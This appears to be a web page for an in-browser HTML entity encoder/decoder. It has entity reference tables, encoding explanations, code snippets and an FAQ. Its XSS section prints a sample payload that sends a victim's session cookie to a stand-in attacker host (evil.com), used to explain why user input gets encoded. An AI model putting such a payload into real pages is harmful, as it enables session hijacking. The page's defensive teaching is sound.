HTML Entity Converter
Examples
Encoding HTML tags for display
<script>alert("Hello")</script>
<script>alert("Hello")</script>
Encoding special characters in text
Price: $50 & tax < $5
Price: $50 & tax < $5
Decoding entities back to text
<div class="box">Content</div>
<div class="box">Content</div>
Common HTML Entities Reference
Click any entity to copy it to your clipboard.
| Char | Named | Numeric | Description |
|---|---|---|---|
| < | < | < | Less-than sign |
| > | > | > | Greater-than sign |
| & | & | & | Ampersand |
| " | " | " | Double quotation mark |
| ' | ' | ' | Single quotation mark / apostrophe |
| Char | Named | Numeric | Description |
|---|---|---|---|
| |   | Non-breaking space | |
|   |   | Thin space | |
| | ​ | ​ | Zero-width space (invisible line break opportunity) |
| ‑ | ‑ | ‑ | Non-breaking hyphen |
| Char | Named | Numeric | Description |
|---|---|---|---|
| € | € | € | Euro sign |
| £ | £ | £ | Pound sterling |
| ¥ | ¥ | ¥ | Yen / Yuan |
| ¢ | ¢ | ¢ | Cent sign |
| ₹ | ₹ | ₹ | Indian Rupee |
| Char | Named | Numeric | Description |
|---|---|---|---|
| © | © | © | Copyright |
| ® | ® | ® | Registered trademark |
| ™ | ™ | ™ | Trademark |
| … | … | … | Horizontal ellipsis |
| — | — | — | Em dash |
| – | – | – | En dash |
| • | • | • | Bullet point |
| · | · | · | Middle dot |
| « | « | « | Left double angle quote |
| » | » | » | Right double angle quote |
| “ | “ | “ | Left double curly quote |
| ” | ” | ” | Right double curly quote |
| Char | Named | Numeric | Description |
|---|---|---|---|
| × | × | × | Multiplication sign |
| ÷ | ÷ | ÷ | Division sign |
| ± | ± | ± | Plus-minus |
| ≠ | ≠ | ≠ | Not equal |
| ≤ | ≤ | ≤ | Less than or equal |
| ≥ | ≥ | ≥ | Greater than or equal |
| ° | ° | ° | Degree symbol |
| ∞ | ∞ | ∞ | Infinity |
| √ | √ | √ | Square root |
| π | π | π | Pi |
| Char | Named | Numeric | Description |
|---|---|---|---|
| ← | ← | ← | Left arrow |
| → | → | → | Right arrow |
| ↑ | ↑ | ↑ | Up arrow |
| ↓ | ↓ | ↓ | Down arrow |
| ↔ | ↔ | ↔ | Left-right arrow |
| ⇒ | ⇒ | ⇒ | Double right arrow (implies) |
What Are HTML Entities?
HTML entities are special codes that represent characters in HTML. They exist because some characters have special meaning in HTML syntax (< starts a tag, & starts an entity), and others can't be typed directly on all keyboards.
Every HTML entity starts with & and ends with ;. The part in between is either a name (like lt for less-than) or a number (like #60 for the same character).
The Five Required Entities
These characters must be encoded when they appear in HTML content or attributes:
<→<— Less-than sign (starts HTML tags)>→>— Greater-than sign (ends HTML tags)&→&— Ampersand (starts entity references)"→"— Double quote (delimits attribute values)'→'or'— Apostrophe (delimits attribute values)
Named vs. Numeric Entities
Named entities use human-readable names: © for ©, € for €. They're easier to read and remember but only exist for common characters.
Numeric entities use Unicode code points. Decimal format: ©. Hexadecimal format: ©. Numeric entities work for any Unicode character, including emoji: 😀 → 😀
Encoding Modes Explained
| Mode | What It Encodes | Best For |
|---|---|---|
| Basic (5 chars) | Only < > & " ' | Modern UTF-8 web pages. Minimal encoding, maximum readability. |
| Full (all non-ASCII) | Basic + all characters outside ASCII (128+) | ASCII-only environments, HTML email, legacy systems. |
| Named entities | Uses named entities where available (© not ©) | Hand-editing HTML. More readable in source code. |
| Numeric only | Uses numeric codes only (© not ©) | Maximum compatibility. Works in XML and older parsers. |
When to Encode HTML Entities
- Displaying code snippets: Show
<div>as text, not as an actual div element. - User-generated content: Prevent XSS attacks by encoding all user input before displaying it.
- Special characters in attributes: Use
"inside double-quoted attributes. - HTML emails: Some email clients have limited Unicode support. Full encoding ensures characters display correctly.
- ASCII-only systems: Legacy systems that can't handle UTF-8 require numeric entity encoding.
- Symbols not on your keyboard: Insert © ™ € ° → without copy-pasting.
XSS Prevention and Security
Cross-Site Scripting (XSS) is a security vulnerability where attackers inject malicious scripts into web pages. If your application displays user input without encoding, an attacker can submit:
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
Without encoding, the browser executes this script, sending the user's session cookie to the attacker. With proper encoding, the same input displays as harmless text:
<script>document.location=...</script>
Security Best Practices
- Always encode user input before inserting it into HTML. Never trust data from users, APIs, or databases.
- Use your framework's built-in encoding. React, Vue, Angular, and server-side frameworks encode by default. Don't bypass it with
dangerouslySetInnerHTMLorv-htmlunless absolutely necessary. - Context matters. HTML encoding protects HTML content. Use JavaScript encoding for JavaScript strings, URL encoding for URLs.
- Content Security Policy (CSP) provides defense in depth. Even if encoding fails, CSP can block script execution.
HTML Encoding vs. URL Encoding
These are two different encoding systems for different purposes:
| HTML Encoding | URL Encoding | |
|---|---|---|
| Purpose | Display characters safely in HTML | Include characters safely in URLs |
| Format | &name; or &#code; | %XX (hex byte value) |
| Space character | or | %20 or + |
| Less-than < | < | %3C |
| Ampersand & | & | %26 |
| Use in | HTML content and attributes | URLs, query strings, form data |
Example: To display <a href="?q=fish & chips"> correctly, you need both:
<a href="?q=fish%20%26%20chips"> ← URL encoding in the href <a href=...> ← HTML encoding to display the tag as text
How to Encode/Decode in Code
JavaScript (Browser)
// Encode
function htmlEncode(str) {
return str.replace(/[&<>"']/g, m => ({
'&': '&', '<': '<', '>': '>',
'"': '"', "'": '''
})[m]);
}
// Decode
function htmlDecode(str) {
var txt = document.createElement('textarea');
txt.innerHTML = str;
return txt.value;
}
Python
import html
encoded = html.escape('')
# Result: <script>alert("XSS")</script>
decoded = html.unescape('<div>')
# Result:
PHP
$encoded = htmlspecialchars('\nPrice: $50 < $100
',
decode: '<script>alert("Hello & welcome!")</script>\n<p class="intro">Price: $50 < $100</p>'
};
function loadSample(type) {
document.getElementById('input').value = samples[type];
if (type === 'encode') encode();
else decode();
}
function setMode(mode) {
currentMode = mode;
document.querySelectorAll('.mode-btn').forEach(function(btn) {
btn.classList.toggle('active', btn.dataset.mode === mode);
});
}
function encode() {
var input = document.getElementById('input').value;
var errorDiv = document.getElementById('error');
var successDiv = document.getElementById('success');
var statsBar = document.getElementById('statsBar');
errorDiv.classList.add('hidden');
successDiv.classList.add('hidden');
statsBar.classList.add('hidden');
if (!input) {
errorDiv.textContent = 'Please enter text to encode';
errorDiv.classList.remove('hidden');
return;
}
try {
var encoded = '';
var entityCount = 0;
for (var i = 0; i < input.length; i++) {
var char = input[i];
var code = input.charCodeAt(i);
var needsEncode = false;
var entity = '';
// Determine if character needs encoding based on mode
if (char === '<' || char === '>' || char === '&' || char === '"' || char === "'") {
needsEncode = true;
} else if (currentMode === 'full' && code > 127) {
needsEncode = true;
}
if (needsEncode) {
entityCount++;
if (currentMode === 'numeric') {
entity = '&#' + code + ';';
} else if (currentMode === 'named' || currentMode === 'basic') {
entity = NAMED_ENTITIES[char] || '&#' + code + ';';
} else {
// full mode
entity = NAMED_ENTITIES[char] || '&#' + code + ';';
}
encoded += entity;
} else {
encoded += char;
}
}
document.getElementById('output').value = encoded;
// Update stats
document.getElementById('inputLen').textContent = input.length;
document.getElementById('outputLen').textContent = encoded.length;
document.getElementById('entitiesCount').textContent = entityCount;
statsBar.classList.remove('hidden');
successDiv.textContent = 'Encoded ' + entityCount + ' character' + (entityCount !== 1 ? 's' : '') + ' successfully!';
successDiv.classList.remove('hidden');
} catch (e) {
errorDiv.textContent = 'Error encoding text: ' + e.message;
errorDiv.classList.remove('hidden');
}
}
function decode() {
var input = document.getElementById('input').value;
var errorDiv = document.getElementById('error');
var successDiv = document.getElementById('success');
var statsBar = document.getElementById('statsBar');
errorDiv.classList.add('hidden');
successDiv.classList.add('hidden');
statsBar.classList.add('hidden');
if (!input) {
errorDiv.textContent = 'Please enter HTML entities to decode';
errorDiv.classList.remove('hidden');
return;
}
try {
var textarea = document.createElement('textarea');
textarea.innerHTML = input;
var decoded = textarea.value;
// Count entities in original
var entityMatches = input.match(/&[#\w]+;/g);
var entityCount = entityMatches ? entityMatches.length : 0;
document.getElementById('output').value = decoded;
// Update stats
document.getElementById('inputLen').textContent = input.length;
document.getElementById('outputLen').textContent = decoded.length;
document.getElementById('entitiesCount').textContent = entityCount;
statsBar.classList.remove('hidden');
successDiv.textContent = 'Decoded ' + entityCount + ' entit' + (entityCount !== 1 ? 'ies' : 'y') + ' successfully!';
successDiv.classList.remove('hidden');
} catch (e) {
errorDiv.textContent = 'Error decoding text: ' + e.message;
errorDiv.classList.remove('hidden');
}
}
function copyOutput() {
var output = document.getElementById('output');
if (!output.value) {
alert('Nothing to copy');
return;
}
navigator.clipboard.writeText(output.value).then(function() {
var successDiv = document.getElementById('success');
successDiv.textContent = 'Copied to clipboard!';
successDiv.classList.remove('hidden');
setTimeout(function() { successDiv.classList.add('hidden'); }, 2000);
});
}
function copyEntity(char) {
navigator.clipboard.writeText(char).then(function() {
var successDiv = document.getElementById('success');
successDiv.textContent = 'Copied: ' + char;
successDiv.classList.remove('hidden');
setTimeout(function() { successDiv.classList.add('hidden'); }, 1500);
});
}
function clearAll() {
document.getElementById('input').value = '';
document.getElementById('output').value = '';
document.getElementById('error').classList.add('hidden');
document.getElementById('success').classList.add('hidden');
document.getElementById('statsBar').classList.add('hidden');
}
HTML Entity Encoder/Decoder FAQ
What are HTML entities?
HTML entities are special codes that represent characters which have special meaning in HTML or cannot be typed directly. For example, < represents < (less-than), > represents > (greater-than), and & represents & (ampersand). They start with & and end with ; — the part between is the entity name or numeric code.
Why do I need to encode HTML entities?
You need to encode HTML entities to display special characters safely in web pages. If you write <script> in HTML without encoding, the browser interprets it as an actual script tag. Encoding it as <script> displays the literal text. This is essential for preventing XSS (cross-site scripting) attacks and displaying code snippets correctly.
What is the difference between named and numeric HTML entities?
Named entities use memorable names like &copy; for © or &euro; for €. Numeric entities use Unicode code points like © (decimal) or © (hexadecimal) for the same copyright symbol. Named entities are more readable; numeric entities work for any Unicode character. Both produce identical results in browsers.
Which characters must be encoded in HTML?
Five characters must always be encoded in HTML content: < (less-than) as <, > (greater-than) as >, & (ampersand) as &, " (double quote) as " in attributes, and ' (single quote) as ' or ' in attributes. Other characters like © or € can be encoded but are optional if your page uses UTF-8 encoding.
What is the HTML entity for a non-breaking space?
The non-breaking space is &nbsp; (named) or   (numeric). It creates a space that prevents line breaks between words. Use it for things like 'Mr. Smith' or '100 km' where you don't want the text to wrap between the two parts. Regular spaces allow line breaks; non-breaking spaces do not.
How do I decode HTML entities?
To decode HTML entities, parse the text and replace each entity with its corresponding character. Named entities like &lt; become <, and numeric entities like < also become <. Browsers do this automatically when rendering HTML. For programmatic decoding, use built-in functions like JavaScript's DOMParser or Python's html.unescape().
What is XSS and how do HTML entities prevent it?
XSS (Cross-Site Scripting) is a security vulnerability where attackers inject malicious scripts into web pages. If user input containing <script>alert('hacked')</script> is displayed without encoding, the browser executes the script. Encoding the input as <script>... displays it as harmless text instead. Always encode user-generated content before displaying it in HTML.
Should I encode all characters or just special ones?
For modern UTF-8 pages, you only need to encode the five reserved HTML characters (<, >, &, ", '). Characters like é, ñ, or 中文 display correctly without encoding if your page declares UTF-8 encoding. Full encoding (converting all non-ASCII to numeric entities) is only needed for ASCII-only environments or email HTML where encoding support is uncertain.
What is the difference between HTML encoding and URL encoding?
HTML encoding converts characters for safe display in HTML using entities like &lt; or <. URL encoding (percent-encoding) converts characters for safe use in URLs using percent codes like %3C. They serve different purposes: HTML encoding for page content, URL encoding for query strings and paths. A space is &nbsp; in HTML but %20 in URLs.
Does this tool send my data to a server?
No. All encoding and decoding happens in your browser using JavaScript. Your text never leaves your device. Nothing is stored, transmitted, or logged. You can verify this by disconnecting from the internet — the tool works identically offline.
Request a New Tool
We review all requests and regularly add new tools based on your suggestions.
Improve This Tool
Suggest a feature, UI change, or variation for this tool.